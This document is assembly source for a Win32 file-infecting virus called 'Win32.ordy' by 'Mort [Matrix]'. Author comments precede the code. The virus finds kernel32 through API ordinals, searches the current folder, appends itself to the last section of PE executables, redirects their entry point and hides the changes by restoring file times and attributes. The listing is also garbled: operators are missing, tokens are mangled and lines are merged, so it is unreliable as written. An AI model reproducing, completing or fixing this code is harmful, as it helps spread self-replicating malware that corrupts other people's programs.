Comment
Win32.ondy by Mort [Matrix]
SIMPLE DIRECT ACTION CURRENT DIR Last Section PE Appender
- Using Ordinal API VALUES TO Access API
Well, in viriis there's most use some stuff to find apis no matter
Of kernel32.dll Type, ... I Use apis' Ordinal Values To Access APIs.
API's Address Is Counted Right Before It's Used, ...
When i search for this Values in Different Versions Of Widows,
I found the Differ, SO i include all ord values I wasplay to find.
U Find Them in Ord.zip File in Tools Section.
I Cant Test Thiss Virii on All Windoze Versions. This One Seems To BE
Good Under Win2k, Anyway IF U Wanna Run It Under Another, Recheck
API's Count, ...
Greetz All Who Helped Me To Create Ordinal Log
Micr0S0ft - i founded my createfilea API DF SENSITIVE, ...
r there More? :))))))))
"
.486
.Model flat, stdcall
EXTRN EXITPROCESS: PROC
EXTRN Messageboxa: Proc
Filetime Struc
FT_DWLOWDATETIME DD?
FT_DWHIGHDATETIME DD?
Filetime Ends
FileSearch Struc
FileAttributes DD?
CREATIONTIME FILETIME?
Lastaccesstime filetime?
LastWritetime filetime?
FILSIZEHIGH DD?
FileSizelow DD?
RESERVED0 DD?
RESERVED1 DD?
Filename DB 0260H DUP (?)
AlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
FILESECH ENDS
_VSIZE = ((@retadd - @ORDY) / 0200H 1) * 0200h
_Debug = 0
.DATA
DD?
.code
@ORDY:
Mov Eax, @ retrad - @ORDY
Push offset @retadd
_retaddress EQU $ - 4
Pushhad
Call @seh
Add ESP, 8
MOV ESP, [ESP]
POP DWORD PTR FS: [0]
POP EAX
Popad
RET
IF _Debug
DB 01000H DUP (0); Coz of Debug Symbols, ... :(
ENDIF
@Seh:
Push DWORD PTR FS: [0]
MOV DWORD PTR FS: [0], ESP
XOR EAX, EAX
Call @findkernel
@Delta label
MOV EBP, [ESP - 4]; Get Delta Handlemov [EBP _KBASE - @delta], EAX
MOV EBX, EAX; Get Kernel Values, ...
Add Eax, DWORD PTR [EAX 03CH]
Add Eax, 078H
Mov Eax, [EAX]
Add Eax, EBX
Add Eax, 018h
XCHG Eax, ESI
Lodsd
Push EAX
Lodsd
Add Eax, EBX
MOV [EBP _ADDBase - @delta], EAX
POP EAX
Lea Edi, [EBP _ORDINALS - @Delta - (_ORDEND - _ORDSTART - 2)]
@nextordinal:
Add Edi, (_ ORDEND - _TSTART) - 2
Scasw
JNZ @nextordinal
MOV [EBP _RINALBASE - @delta], EDI
Push 02000H
Push 040h
Mov Eax, _GlobalAlloc
Call @callapi
Push eax; for globalfree
Push EAX
Call @mask
DB '*. *', 0
@mask:
Mov Eax, _findfirstfilea
Call @callapi
XCHG Eax, ESI
@examine:
MOV EAX, [ESP]
Mov Al, Byte PTR [Eax FileAttributes]]
And Al, 010h
CMP Al, 010h
JNZ @filefounded
@nextfile:
Push DWORD PTR [ESP]
PUSH ESI
Mov Eax, _findnextfilea
Call @callapi
Dec EAX
JZ @examine
Mov Eax, _globalfree
Call @callapi
XOR EAX, EAX
Sub Eax, [ESP 030H]; Cause Exception
@findkernel:
Add Eax, [ESP 030H]
And Eax, 0FFFFF000H
@NextPage:
Sub Eax, 01000H
CMP Word PTR [EAX], 'ZM'
JNZ @nextpage
RET
; ------------------------------------------------- -----------------------
@RW:
EDI - File Handle
EAX - ReadFile / Writefile
EDX - Buffer
ECX - SIZE
Pushhad
PUSH 0
Call @fw
DD?
@fw:
Push ECX EDX EDI
Call @callapi
Popad
RET
; ------------------------------------------------- -----------------------
@FileFounded:
IF _Debug
MOV EAX, [ESP]
CMP DWORD PTR [EAX FileName], 'SOHG'
JZ @oki
JMP @nextfile
@oki:
ENDIF
MOV EBX, [ESP]
MOV EAX, [EBX FileSizelow]
CMP EAX, 04000H
JB @nextfilemov Eax, DWORD PTR [EBX FileName]
And DWORD PTR [EBX LastWritetime], EAX
JZ @nextfile
OR DWORD PTR [EBX LastWritetime], EAX
Mov Edx, _ReadFile
XCHG EAX, EBX
Add Eax, 01000H
XCHG EAX, EDX
Call @openrw
Push Edx
Push EDI
Mov eax, _closehandle
Call @callapi
POP EDX
CLD
MOV EDI, EDX
MOV EAX, 'EPZM'
Scasw
JNZ @nextfile
SHR EAX, 010h
STD
Add Edi, DWORD PTR [EDI 03AH]
Scasw
Scasw
JNZ @nextfile
Mov Eax, [EDI 076H]
SHL EAX, 3
Add Eax, 052H
XCHG EAX, EBX
Movzx Eax, Word PTR [EDI 8]
Imul Eax, 028H
XADD EBX, EAX
Mov Eax, _vsize
Add [EDI 052H], EAX; Add ImageSize
XADD [EBX EDI 010H], EAX; Eax - Old Size
Push EAX
Add Eax, [EBX EDI 014H]; add phys. Offset
MOV [EBP _VIRBODYPOFS - @delta], EAX
POP EAX
Add Eax, [EBX EDI 0CH]
XCHG EAX, [EDI 02AH]; SET / GET Entrypoint
Add Eax, [EDI 036H]
MOV [EBP _Retaddress - @delta], EAX; set it, ...
Add DWORD PTR [EBX EDI 08H], 01000H; Add Virtual Size
OR DWORD PTR [EBX EDI 024H], 0A0000020H
Lea Eax, [EBP @FinalInfection - @delta]
Push EAX
Mov Eax, _Writefile
@openrw:
MOV ECX, 01000H
CLD; Coz of createfilea df sensitivity, ... :)))))
Call @open
Call @RW
RET
; ------------------------------------------------- -----------------------
@seta:
Push EBX
Push EAX
Mov Eax, _SetFileAttributesa
Call @callapi
RET
; ------------------------------------------------- ----------------------
_Closehandle = 0; API Handles
_Createfilea = 2
_GlobalAlloc = 4
_GlobalFree = 6
_Writefile = 8
_Readfile = 0ah
_Findfirstfilea = 0ch
_Findnextfilea = 0EH
_Sendoffile = 010h_setfiletime = 012h
_SETFILEATTRIBUTESA = 014H
_ORDSIZE EQU _ORDEND - _ _ORDSTART
SHL 2
_ordinals label
_ORDSTART LABEL
_ORDINALS95 Label
DW 0682; APIS NUM
DW 088H * 4; CloseHandle
DW 09DH * 4; CREATEFILEA
DW 01B5H * 4; GLOBALLOC
DW 01BCH * 4; GLOBALFREE
DW 02E3H * 4; Writefile
DW 0242H * 4; ReadFile
DW 0F9H * 4; FindfirstFilea
DW 0fch * 4; FindnextFile
DW 0281H * 4; setndoffile
DW 028BH * 4; SetFileTime
DW 0288H * 4; SetFileAttributesa
_ORDEND LABEL
_ORDINALS98 Label; (R1, SE)
DW 0745; APIS NUM
DW 09FH * 4; CloseHandle
DW 0B8H * 4; CreateFilea
DW 01E5H * 4; GLOBALLOC
DW 01ech * 4; GlobalFree
DW 0335H * 4; Writefile
DW 027DH * 4; ReadFile
DW 011BH * 4; FindfirstFilea
DW 0120H * 4; FindNextFile
DW 02C5H * 4; STENDOFFILE
DW 02CFH * 4; setFileTime
DW 02CCH * 4; SetFileAttributesa
_Ordinalsnt Label
DW 02A1H; APIS NUM
DW 018H * 4; CloseHandle
DW 031H * 4; CREATEFILEA
DW 0155H * 4; GLOBALLOC
DW 015CH * 4; GLOBALFREE
DW 027BH * 4; Writefile
DW 01D6H * 4; ReadFile
DW 082H * 4; Findfirstfilea
DW 087H * 4; FindNextFile
DW 0210H * 4; STENDOFFILE
DW 021AH * 4; SetFileTime
DW 0217H * 4; SetFileAttributesa
_ordinals2k label
DW 0337H; APIS NUM
DW 01EH * 4; CloseHandle
DW 037H * 4; CreateFilea
DW 019CH * 4; GLOBALLOC
DW 01A3H * 4; GLOBALFREE
DW 030EH * 4; Writefile
DW 023DH * 4; ReadFile
DW 0A3H * 4; Findfirstfilea
DW 0ACH * 4; FINDNEXTFILE
DW 028CH * 4; SetENDOFFILE
DW 0297H * 4; SetFileTime
DW 0293H * 4; SetFileAttributesa
; ------------------------------------------------- -----------------------
@open:
EAX - FileName
Pushhad
Mov Eax, [ESP 028H]
Add Eax, FileName
PUSH 0 0 3 0 1
Push 080000000h OR 040000000H
Push EAX
Mov EBX, 020HCall @seta
Mov eax, _createfilea
Call @callapi
MOV [ESP], EAX; Handle To EDI
Popad
RET
; ------------------------------------------------- --------
EAX - API Handle
@callapi:
POP EDI
Add eax, 012345678h
_ORDINALBASE EQU $ - 4
Movzx Eax, Word PTR [EAX]
Add eax, 012345678h
_addbase EQU $ - 4
Mov Eax, [EAX]
Add eax, 012345678h
_KBase EQU $ - 4
Call EAX
JMP EDI
; ------------------------------------------------- ---------------
@FinalInfection:
Mov Eax, 012345678H
_VIRBODYPOFS EQU $ - 4
Sub Eax, 01000H
Push EAX
Mov Eax, _readfile
XOR ECX, ECX
Inc ECX
@ nextByte2seek:
Call @RW
Dec dword PTR [ESP]
JNZ @ nextByte2seek
POP EAX
Mov ECX, _VSIZE
Lea Edx, [EBP @ORDY - @Delta]
Add Eax, _Writefile
Call @RW
PUSH ESI
Push EDI EDI
Mov Eax, _setendoffile
Call @callapi
MOV EBX, [ESP]
MOV EAX, [ESP 0CH]
Add Eax, LastWrittime
Push EAX
Sub Eax, 8
Push EAX
Sub Eax, 8
Push EAX
Push EBX
Mov Eax, _SetFileTime
Call @callapi
Mov eax, _closehandle
Call @callapi
MOV EBX, [ESP 4]
MOV EAX, [EBX FileAttributes]]
XCHG EAX, EBX
Add Eax, FileName
Call @seta
POP ESI; Restore Search Handle
@FuckFile:
JMP @nextfile
@retadd:
PUSH 0
Call @title
DB '.RDY BY MORT [Matrix]', 0
@title:
Call @mess
DB 'Hey Guys, CreateFilea API IS DF SENSITIVE !!! :)))', 0
@mess:
PUSH 0
Call Messageboxa
Call EXITPROCESS, 0
RET
End @ORDY
